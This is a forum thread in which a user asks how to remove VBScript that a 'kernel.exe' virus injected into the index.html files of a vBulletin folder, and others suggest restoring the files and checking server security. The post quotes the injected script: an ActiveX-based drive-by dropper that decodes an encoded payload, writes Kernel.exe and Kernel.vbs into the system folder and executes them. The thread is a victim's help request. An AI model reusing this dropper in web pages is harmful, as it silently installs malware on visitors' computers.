Last week, my computer has infected from kernel.exe virus.
I removed that, but now i shocked. It puts this code all index.html pages
in Vbulletin folder in my desktop ?

It put this code to

includes/index.html
images/index.html
clientscript/index.html
etc.

<script language=vbscript>
on error resume next
fileexe1="07709014400000300000000000400000000025525500000018 40000000000000000000000640000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000018400000000001403118 60140001800092050331840010762050330841041051150321 12114111103114097109032099097110110111116032098101 03211411711003210511003206807908303210911110010104 60130130100360000000000000000000002120361420281440 69224079144069224079144069224079030090243079135069 22407910810124207914706922407908210509910414406922 4079"
dim sys
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 "
set fso = df.createobject("Scripting.FileSystemObject","")
set s=df.CreateObject("Shell.Application.1","")
set re=df.createobject("wscript.shell","")
sys=fso.GetSpecialFolder(1)
For a = 1 To Len(filevbs1) Step 3
filevbs2=filevbs2 & chr(mid(filevbs1,a,3))
if a < len(fileexe1)+1 then fileexe2=fileexe2 & chr(mid(fileexe1,a,3))
next
fso.CreateTextFile(sys & "\TSP32E.DLL").write fileexe1
if fso.opentextfile(sys & "\Systeme.dll").readall<>"on" then
fso.CreateTextFile(sys & "\Kernel.exe").write fileexe2
s.Open (sys & "\Kernel.exe")
end if
fso.CreateTextFile(sys & "\TSP32V.DLL").write filevbs1
if fso.opentextfile(sys & "\Systemv.dll").readall<>"on" then
fso.CreateTextFile(sys & "\Kernel.vbs").write filevbs2
s.Open (sys & "\Kernel.vbs")
end if
</script>

I think maybe the problem of this

Parse error: syntax error, unexpected $end, expecting T_STRING or T_VARIABLE or '{' or '$'

from that virus code ?

I am very shocked of that ..

The full code is this. (I couldnt paste the full code because it is about 24.500 characters)
http://rapidshare.com/files/45994675/kernelcode.html

This is not default vb code as the index.html are empty. Someone put that there

This is not default vb code as the index.html are empty. Someone put that there

Yes, of course. But is there anyway to get rid of that ?

Find out who put it there. Have you downloaded any 'dodgy files' lately?

Delete those files also

Yes, of course. But is there anyway to get rid of that ?

Replace it with the original file.

Also, if you didn't put that there I would suggest looking at how secure your server is, because no one should be able to add that. Check file permissions, change passwords, server logs, etc. Having someone install a virus on your computer through your website is very bad, and should definately be looked into.

Replace it with the original file.

Also, if you didn't put that there I would suggest looking at how secure your server is, because no one should be able to add that. Check file permissions, change passwords, server logs, etc. Having someone install a virus on your computer through your website is very bad, and should definately be looked into.

I removed that virus by reading this
http://www.spywareremove.com/removekernelexe.html

Maybe after

It put the codes to Vbulletin Folder in my desktop.

When i got this

Parse error: syntax error, unexpected $end, expecting T_STRING or T_VARIABLE or '{' or '$'

error, i uploaded vbulletin files from desktop to web, and i have seen that. :(